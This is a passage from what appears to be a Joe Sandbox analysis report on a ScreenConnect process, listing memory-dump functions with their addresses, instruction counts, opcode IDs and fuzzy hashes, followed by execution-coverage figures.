                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2248d55b2366c5ebfa6f9ce51c22242fd578a3bcd59cbcc6b1be9929d29efa62
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90111236D0010A9FCF41DFA8D9409DEBBF5FF49314B10856AD505BB260E772AA0ACB91
                                                                                                                                                                                                                                                        Function 02A1D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419490259.0000000002A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A1D000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a1d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 1d70ee5e9c111e54a648e76d9f8a6b74477a565079892b1933675b35a605b63a
                                                                                                                                                                                                                                                        • Instruction ID: bd83a34320ce802de13387eaa889a912e4e3ab9ea46430d2e460b483b8daf748
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d70ee5e9c111e54a648e76d9f8a6b74477a565079892b1933675b35a605b63a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1801F731404B009AD7208B19C8C4B67BF98EF45374F18C429ED4A0B286C7799841C6B1
                                                                                                                                                                                                                                                        Function 02A74FD0 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d0f11a2921eb936f42810d516275db90d6e320c1ddeba3f04e24a5658e42012e
                                                                                                                                                                                                                                                        • Instruction ID: 13fc5a4ae2a027016f61f65088f281a8519efd051b32ee9dc7605ce8b0e0db02
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0f11a2921eb936f42810d516275db90d6e320c1ddeba3f04e24a5658e42012e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 55015E32D00119DBCF05DFA9D9548CEBBB2EF88724F458426E405B7264DB31A916CB90
                                                                                                                                                                                                                                                        Function 02A1D006 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419490259.0000000002A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A1D000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a1d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f98a884a43fa4f200fb7e9c4306bf6ae073b6915faa17bde80463971f5f2da07
                                                                                                                                                                                                                                                        • Instruction ID: 679606c483689f4fb4728ca7fc1997a2f180d4060641c6c31ed1787b83a7804f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f98a884a43fa4f200fb7e9c4306bf6ae073b6915faa17bde80463971f5f2da07
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C101527140D7D09FD7128B258C94B52BFB4EF43224F1C80DBE9898F1A3C2695845C772
                                                                                                                                                                                                                                                        Function 02A78168 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d3c7b93068d18817bec2079e49e5a0b4dfec2ec6b97d710c0fd986a514e2ace2
                                                                                                                                                                                                                                                        • Instruction ID: 004b56aadcf7db6454b8e635a86c3ef0a0db3556b58019a47fa8259c9ab34c81
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d3c7b93068d18817bec2079e49e5a0b4dfec2ec6b97d710c0fd986a514e2ace2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3F08C77B0C2146FD728CBBAA80069BBBDECBC4224B14C07FE54DC3780E935A4018768
                                                                                                                                                                                                                                                        Function 02A712A0 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a3d3d58288af05ab105593b557798433e8f99d428240e16e256a9fb5e38c4b34
                                                                                                                                                                                                                                                        • Instruction ID: ec044f964ea94b84ae7f2beed71bb25fd592fd04a25a9c00b4c7a82139052e84
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3d3d58288af05ab105593b557798433e8f99d428240e16e256a9fb5e38c4b34
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90F0B4356406145FC712AA2CEEA0B5B7B9ADF84664704852DD049D7704DF34E9098BD4
                                                                                                                                                                                                                                                        Function 02A78157 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 8da5c02f9c02e57f9eb18b2f7e7f8815e63dd2e55bfdb5fc74d3f3d228d9ff89
                                                                                                                                                                                                                                                        • Instruction ID: 5db8a0fda12fc2f7da95c4e95bb072998042b74ac04d0f4a847f86a34971555f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8da5c02f9c02e57f9eb18b2f7e7f8815e63dd2e55bfdb5fc74d3f3d228d9ff89
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5DE0ED77A1C3542ED724CA6AAC02B8BBBCECBC0224F04847FA54CD2280EC28D2018325
                                                                                                                                                                                                                                                        Function 02A71414 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 26fd2aa382b540d94e4c3ea227a6aa7d38ac96f76bd66f06d5160938e16af32c
                                                                                                                                                                                                                                                        • Instruction ID: 16f563e62bda30ed52fcc84cd8f4ac55e315dcb7f0baefd0eeb6b499ea1483fb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 26fd2aa382b540d94e4c3ea227a6aa7d38ac96f76bd66f06d5160938e16af32c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4CF09E730082500BC311D62CFC42FDA3FE9DFD2261B0809EAE041CB225DE5CEA09C360
                                                                                                                                                                                                                                                        Function 02A70838 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: baaa9b54e661cf7376cb5c5bdb1cc7612a893397eeac01f451ad003ac92c1b46
                                                                                                                                                                                                                                                        • Instruction ID: a92fcba43a781d63a166ef07218cf3a70d275585ba8e40b2df780d554d0330be
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: baaa9b54e661cf7376cb5c5bdb1cc7612a893397eeac01f451ad003ac92c1b46
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3F0EC72804158AFCB10DFACDC92BAD7BA9DB40210B2045A9E048D3240EE398F0ADB80
                                                                                                                                                                                                                                                        Function 02A75F68 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 9bb3763923d0cde9e74b206cf7d42cc9b461631b0fbbb1953b4a3620b6df954b
                                                                                                                                                                                                                                                        • Instruction ID: faf9a2a18afa77a6b22e0870932915feba71aa41e603e092bb37e7936c905cf1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9bb3763923d0cde9e74b206cf7d42cc9b461631b0fbbb1953b4a3620b6df954b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1E09236F115016BCB00C3189D86792BBDACB491A9BBC8632F836C7241EF11DD014384
                                                                                                                                                                                                                                                        Function 02A712B0 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 1e60f4bdc9279999032d522741d164a71575adaeffaf7f3fdec4d8d214b785c4
                                                                                                                                                                                                                                                        • Instruction ID: b16f5c026ddb4b6edf3deab5816551bde85f83ec2bc3f0f3165e2cbb4fa84126
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1e60f4bdc9279999032d522741d164a71575adaeffaf7f3fdec4d8d214b785c4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0BF0A035B40A585F8716A65DAA60A5F77DADBC5664300846DD009C7604DF30EC098FD4
                                                                                                                                                                                                                                                        Function 02A71818 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 4d5c83479c8c2994e4e187c579a52c202469d800e7f1e1088606056977d7c839
                                                                                                                                                                                                                                                        • Instruction ID: ba8cf98f6a87deaa7bb9e932acfe53fbad9fd0f57e64a30614b7a20e35b07df5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d5c83479c8c2994e4e187c579a52c202469d800e7f1e1088606056977d7c839
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22F0A036A00150CFC7255F24A8196AC7BA6EB45336B0A84A9D41AE3214DF3AC817CF90
                                                                                                                                                                                                                                                        Function 02A76EE8 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 776321e7ebb757d04e6abbdd4150fab7ab6525d42297d56ee486c3c4c3a9c6ab
                                                                                                                                                                                                                                                        • Instruction ID: 37495de8558d496897b6ae2de3ebafbf023626aa47db4cf9bca9f89524f7b133
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 776321e7ebb757d04e6abbdd4150fab7ab6525d42297d56ee486c3c4c3a9c6ab
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D2E0E5327083909F87055B99649812ABEE6EB8867131544BEF149C3391CE744C498394
                                                                                                                                                                                                                                                        Function 02A76EF8 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3b61b743085bdefb6d08b7e994b4ee57cdffc55c1a90ac622851bccfd03004d0
                                                                                                                                                                                                                                                        • Instruction ID: 92aba7be776a7a3eb827504aca0173803fa1eb8684f31ffdff74797661eb4b47
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b61b743085bdefb6d08b7e994b4ee57cdffc55c1a90ac622851bccfd03004d0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1DE0DF31704360AB8A141B9F648812FBEEFEBC8A71710043EF20AC3340CE718C0A43A8
                                                                                                                                                                                                                                                        Function 02A71DA1 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: fbe68637f9b26c4058debf1b78d8d4fdf992f42168212cda8c152f8f4bcdaeb4
                                                                                                                                                                                                                                                        • Instruction ID: 52a5d11018a8a193e6c92d6c57e52c09f89a2a1b3375b0cd80ff4f0204119840
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fbe68637f9b26c4058debf1b78d8d4fdf992f42168212cda8c152f8f4bcdaeb4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30E0923AB002146BC3056A6DE419A6E3EABDBC9371B064527F516C33A1CE34DD1687D4
                                                                                                                                                                                                                                                        Function 02A75F78 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 8ecd5ee5757a20b0b49d923a26a527002a2f374ca7e2a3de12e4a72289dad7ad
                                                                                                                                                                                                                                                        • Instruction ID: 72b8f291ade59dfbb2198389d2bdca222e5b19ef013321f66d325107fd0df4d6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ecd5ee5757a20b0b49d923a26a527002a2f374ca7e2a3de12e4a72289dad7ad
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51E08632F014515B8B10935C9D85655B7DACB892657BC8572FC29CB380FF21DC414384
                                                                                                                                                                                                                                                        Function 02A713D0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 8f88cad33b7c402f321e7faad0982f1a6e8d06ac02078bce9e7ffd2c960ce7fb
                                                                                                                                                                                                                                                        • Instruction ID: 6b5401c63ffb9fc47e0fb0611b712a6ea1e1c10d8cf9be01b2da103e23a0840f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8f88cad33b7c402f321e7faad0982f1a6e8d06ac02078bce9e7ffd2c960ce7fb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15E086361046101BC715E62CFD81FCE2BDADBD9364F040E78F00197215DE68EA4947A4
                                                                                                                                                                                                                                                        Function 02A71DF9 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d7a22295074167db4464939e3fb20c17d345a9d66e81e9b303c6b287f59908e9
                                                                                                                                                                                                                                                        • Instruction ID: a6c4c3e3d04030c388aef928fc9a46223dfcb690a0c4dc9ce2b0f397b5beb055
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d7a22295074167db4464939e3fb20c17d345a9d66e81e9b303c6b287f59908e9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28E0867594120CAFDB40DFB4EE86B5C7BB9DB48354F5041A8E40CE3210DE359F008B44
                                                                                                                                                                                                                                                        Function 02A71DB0 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ebd1ab029ef447627d37a44a02edaa66d878d36e6d0171b059bae674ea07adf1
                                                                                                                                                                                                                                                        • Instruction ID: 730b84a6d01fea2c82719f6530c90b3ad66c60b6d8b8fa41cef999ae468b8c65
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ebd1ab029ef447627d37a44a02edaa66d878d36e6d0171b059bae674ea07adf1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2CE08C3AB402146B83156A7DF41C86E7AEBEBC93713124527F51AC3390CF30DC168BA4
                                                                                                                                                                                                                                                        Function 02A71310 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 823c4e668c603ce3cc2b7be1fad728c8a60c12e1838dd1fba97968e8e1b93811
                                                                                                                                                                                                                                                        • Instruction ID: 60f12684528353c4da2c91bb6909236fe065a3a309c9c16f74e22aab463022ee
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 823c4e668c603ce3cc2b7be1fad728c8a60c12e1838dd1fba97968e8e1b93811
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74E0E672D051085F8B80DFBCCD55259BBF5EB48204F5449A9D41DE7301F632A6168B91
                                                                                                                                                                                                                                                        Function 02A77FB8 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a9359159e7b58a0227aaa9bb97d448d085bc1794b46c05386ad5bd5d4c7273b2
                                                                                                                                                                                                                                                        • Instruction ID: 93c33913442714d291c730daa3bb2158cc73f52067e6f88e45a5bd9cb2842a66
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a9359159e7b58a0227aaa9bb97d448d085bc1794b46c05386ad5bd5d4c7273b2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6EE04635A59300AFD340AF24E946785BFE0AB49604F08882CF88CC3241E638AD858B82
                                                                                                                                                                                                                                                        Function 02A78120 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 385408e8203ecc633cc135f0cd6818b462ff9c285199b1f63652be66e17e3478
                                                                                                                                                                                                                                                        • Instruction ID: 5596613cbb8a32a454c3b94ee2dda952d4d64e99b3094a49216c35f2734447d3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 385408e8203ecc633cc135f0cd6818b462ff9c285199b1f63652be66e17e3478
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13E08C31404211AFD380EF28EA89385BBF0FF04204F054C2CE8CDD3200E338E94A8B82
                                                                                                                                                                                                                                                        Function 02A70848 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 21e5efa5c589ddfddddfebc6df7b0e3e3d6d52b66cfa70cdeecb709c7befba8c
                                                                                                                                                                                                                                                        • Instruction ID: 95e76c5e36f12f75fee032d8187f11c0e10a909cbd38cd117a84ae182551919e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21e5efa5c589ddfddddfebc6df7b0e3e3d6d52b66cfa70cdeecb709c7befba8c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30D01730E4120CEF8B04EFACEA0595EBBB9EB44214B1045A8E408D3240EE356F089B90
                                                                                                                                                                                                                                                        Function 02A71E08 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b6eba4eb95c1436c3c3f7d9dc43e60f03d7a5e1491ad76bbf132c49e46029f9a
                                                                                                                                                                                                                                                        • Instruction ID: ff41de0d1e62b409080f2b07ad5404781d9843c03fda43400b68eeb2bb3d4a4b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6eba4eb95c1436c3c3f7d9dc43e60f03d7a5e1491ad76bbf132c49e46029f9a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01D0127190110CEF8B40DFB4EA4555DBBB9DB48324B1041A9D40CD3200DA315F049B40

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:14.5%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:88.6%
